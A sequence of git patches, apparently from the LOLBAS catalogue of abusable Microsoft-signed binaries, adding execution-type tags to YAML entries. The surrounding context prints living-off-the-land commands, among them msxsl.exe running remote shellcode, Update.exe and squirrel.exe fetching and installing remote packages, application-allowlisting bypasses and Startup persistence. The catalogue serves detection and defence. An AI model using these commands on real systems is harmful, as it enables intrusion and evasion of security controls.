+ - Execute: Csharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe From eb3afc669e3756192df02a3c6f7ea11586b15116 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:01:33 +0200 Subject: [PATCH 111/148] Update DefaultPack.yml Tags Added Tags: Execute EXE --- yml/OtherMSBinaries/DefaultPack.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a63da150..61b19efd 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe Code_Sample: From 6e9faa63da9fc5350893746f53bf4bbc4acd1789 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:02:22 +0200 Subject: [PATCH 112/148] Update Devinit.yml Tags Added Tags: Execute MSI Execute Remote --- yml/OtherMSBinaries/Devinit.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml index 2ed83b48..e02a7001 100644 --- a/yml/OtherMSBinaries/Devinit.yml +++ b/yml/OtherMSBinaries/Devinit.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.007 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: MSI + - Execute: Remote Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\Tools\devinit\devinit.exe From 1ba7b664e3fe283bdbe00687b7d8461735372963 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:03:26 +0200 Subject: [PATCH 113/148] Update Devtoolslauncher.yml Tags Added Tags - Execute EXE --- yml/OtherMSBinaries/Devtoolslauncher.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index 2a67dc63..952594d7 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed + Tags: + - Execute: EXE - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7 and up with VS/VScode installed + Tags: + - Execute: EXE Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' Code_Sample: From bd6667bc9a561e7c61200d6c98be279f2f2410c7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:07:27 +0200 Subject: [PATCH 114/148] Update Dnx.yml Tags Added Tag: Execute C# --- yml/OtherMSBinaries/Dnx.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index 44a00cd2..eb613494 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Csharp Full_Path: - Path: no default Code_Sample: From b24f3ab6aba67c373fd69cc3b72192645330e462 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:09:40 +0200 Subject: [PATCH 115/148] Update Dotnet.yml tags Added Tags: Execute: .NetDLL Execute: Fsharp Execute: CSProj --- yml/OtherMSBinaries/Dotnet.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 39b59be4..57de2447 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed + Tags: + - Execute: .NetDLL - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any DLL. Usecase: Execute DLL @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with .NET installed + Tags: + - Execute: .NetDLL - Command: dotnet.exe fsi Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands Usecase: Execute arbitrary F# code @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 and up with .NET SDK installed + Tags: + - Execute: Fsharp - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 and up with .NET Core installed + Tags: + - Execute: CSProj Full_Path: - Path: 'C:\Program Files\dotnet\dotnet.exe' Detection: From e2d2633470cb866e21eaa87854fcb2e6de77d4d0 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:10:39 +0200 Subject: [PATCH 116/148] Update Dxcap.yml Tags Added Tags: Execute EXE --- yml/OtherMSBinaries/Dxcap.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 72b01454..05ac2aad 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Windows\System32\dxcap.exe - Path: C:\Windows\SysWOW64\dxcap.exe From bc80d35981bd42a024bd494027ae43142ef1119f Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:14:09 +0200 Subject: [PATCH 117/148] Update Fsi.yml tags Added Tags: Execute Fsharp --- yml/OtherMSBinaries/Fsi.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index fb183235..c770ad2a 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Fsharp - Command: fsi.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Fsharp Full_Path: - Path: C:\Program Files\dotnet\sdk\\FSharp\fsi.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe From a5ede4597c6aee0010f060b18b02e162a1d4a908 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:14:57 +0200 Subject: [PATCH 118/148] Update FsiAnyCpu.yml tags Added Tags: Execute Fsharp --- yml/OtherMSBinaries/FsiAnyCpu.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 5b55e35a..2a8f79c6 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Fsharp - Command: fsianycpu.exe Description: Execute F# code via interactive command line Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1059 OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + Tags: + - Execute: Fsharp Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe Code_Sample: From 5f2bc7efc263d6840d8f3e1985255ab46c289901 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:15:53 +0200 Subject: [PATCH 119/148] Update Mftrace.yml Tags Added Tags: Execute: EXE --- yml/OtherMSBinaries/Mftrace.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index 09c960a8..c564efac 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Mftrace.exe powershell.exe Description: Launch cmd.exe as a subprocess of Mftrace.exe. Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe From e839f4bbbe16e8498b8f39a265610fa70dfbfc60 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:18:12 +0200 Subject: [PATCH 120/148] Update Microsoft.NodejsTools.PressAnyKey.yml Tags Added Tags: Execute EXE --- yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml index 9ac12c29..7ca4f43f 100644 --- a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml +++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe From 2e922f4099b7e511d3bdb558ccd41111aaad8bb6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:19:15 +0200 Subject: [PATCH 121/148] Update Msdeploy.yml Tags Added Tags Execute: CMD --- yml/OtherMSBinaries/Msdeploy.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index cc3754cf..7cc09217 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server + Tags: + - Execute: CMD - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" Description: Launch calc.bat via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server + Tags: + - Execute: CMD - Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe Description: Copy file from source to destination. Usecase: Copy file. From f9ea58c0e2550b4565b0db8cf2e0a7763a4e11da Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:20:50 +0200 Subject: [PATCH 122/148] Update Msxsl.yml Tags Added Tags: Execute: XSL Execute: Remote --- yml/OtherMSBinaries/Msxsl.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index 7020e0a2..d87746e4 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL - Command: msxsl.exe customers.xml script.xsl Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL + - Execute: Remote - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. @@ -32,6 +39,9 @@ Commands: Privileges: User MitreID: T1220 OperatingSystem: Windows + Tags: + - Execute: XSL + - Execute: Remote - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o Description: Using remote XML and XSL files, save the transformed XML file to disk. Usecase: Download a file from the internet and save it to disk. From 7b7c58b2d103474c24d02ce4dcef7b92c4049638 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:21:46 +0200 Subject: [PATCH 123/148] Update OpenConsole.yml Tags Added Tags: - Execute: EXE --- yml/OtherMSBinaries/OpenConsole.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/OpenConsole.yml b/yml/OtherMSBinaries/OpenConsole.yml index 81d00e30..d56eaca2 100644 --- a/yml/OtherMSBinaries/OpenConsole.yml +++ b/yml/OtherMSBinaries/OpenConsole.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe From c6753c4b2d869a67c06bbeb530480a85341424ac Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:23:27 +0200 Subject: [PATCH 124/148] Update Rcsi.yml Tags Added Tags: Execute: Csharp --- yml/OtherMSBinaries/Rcsi.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 22d880c4..d39ab320 100644 --- a/yml/OtherMSBinaries/Rcsi.yml +++ b/yml/OtherMSBinaries/Rcsi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Csharp - Command: rcsi.exe bypass.csx Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: Csharp Full_Path: - Path: no default Code_Sample: From fa2ded3a9722171398b235f2b8ae583663c6bde1 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:24:35 +0200 Subject: [PATCH 125/148] Update Remote.yml Tags Added Tags: Execute EXE Execute Remote --- yml/OtherMSBinaries/Remote.yml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index 6ea1d455..cb63fb6b 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Remote.exe /s "powershell.exe" anythinghere Description: Spawns powershell as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk @@ -25,6 +29,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: EXE + - Execute: Remote Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe From 57e5e0d7125adc21c0942d4617ce681c251aebda Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:26:03 +0200 Subject: [PATCH 126/148] Update Sqlps.yml Tags Added Tags: Execute Powershell --- yml/OtherMSBinaries/Sqlps.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index 906ca523..aaa583e7 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: Powershell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe From 4df50e3e79bc185dfd0e85bb9fe5dc17c4bb7605 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:26:38 +0200 Subject: [PATCH 127/148] Update Sqltoolsps.yml Tags Added Tags: Execute: Powershell --- yml/OtherMSBinaries/Sqltoolsps.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index c17ee4a4..44835607 100644 --- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: Powershell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Code_Sample: From ae12e139df1c89a228ca30335104e817da8512c4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:28:11 +0200 Subject: [PATCH 128/148] Update Squirrel.yml tags Added Tags: Execute Nuget Execute Remote --- yml/OtherMSBinaries/Squirrel.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index 0055ff32..a8207ad9 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --update [url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: squirrel.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Squirrel.exe' Code_Sample: From 384d674908419bbe1528f93477911d7056c8a4d4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:29:50 +0200 Subject: [PATCH 129/148] Update Te.yml Tags Added Tags: Execute WSH --- yml/OtherMSBinaries/Te.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 5c3bdb53..d5d0580c 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: WSH - Command: te.exe test.dll Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures. Usecase: Execute DLL file. From ce9d4e59f57db42e12748f13bb9a06b110e6518a Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:32:01 +0200 Subject: [PATCH 130/148] Update Teams.yml Tags Added Tags: - Execute: Javascript Execute CMD --- yml/OtherMSBinaries/Teams.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index fffb4b1f..8cfa5433 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Javascript - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. Usecase: Execute JavaScript code @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: Javascript - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: CMD Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Teams.exe' Code_Sample: From 927189f01e9b38a4996092c77900837ef638b5b7 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:35:45 +0200 Subject: [PATCH 131/148] Update Update.yml Tags Added Tags: Execute Nuget Execute Remote Execute EXE --- yml/OtherMSBinaries/Update.yml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index f4049a49..c0b51ae3 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -25,6 +28,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -32,6 +38,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --update=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -39,6 +48,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -46,6 +58,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=[url to package] Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary @@ -53,6 +68,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass @@ -60,6 +78,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -67,6 +88,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary @@ -74,6 +98,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: Nuget + - Execute: Remote - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Execute binary @@ -81,6 +108,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --createShortcut=payload.exe -l=Startup Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it. Usecase: Execute binary @@ -88,6 +117,8 @@ Commands: Privileges: User MitreID: T1547 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE - Command: Update.exe --removeShortcut=payload.exe -l=Startup Description: Run the command to remove the shortcut created in the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory you created with the LolBinExecution "--createShortcut" described on this page. Usecase: Execute binary @@ -95,6 +126,8 @@ Commands: Privileges: User MitreID: T1070 OperatingSystem: Windows 7 and up with Microsoft Teams installed + Tags: + - Execute: EXE Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\update.exe' Code_Sample: From f080b42594cc7a41a7b22c9c4dfa7c2c0ab37ca6 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 22:36:35 +0200 Subject: [PATCH 132/148] Update VSDiagnostics.yml Tags Added Tags: Execute EXE --- yml/OtherMSBinaries/VSDiagnostics.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/yml/OtherMSBinaries/VSDiagnostics.yml b/yml/OtherMSBinaries/VSDiagnostics.yml index 88ccc885..ba2b6ba9 100644 --- a/yml/OtherMSBinaries/VSDiagnostics.yml +++ b/yml/OtherMSBinaries/VSDiagnostics.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 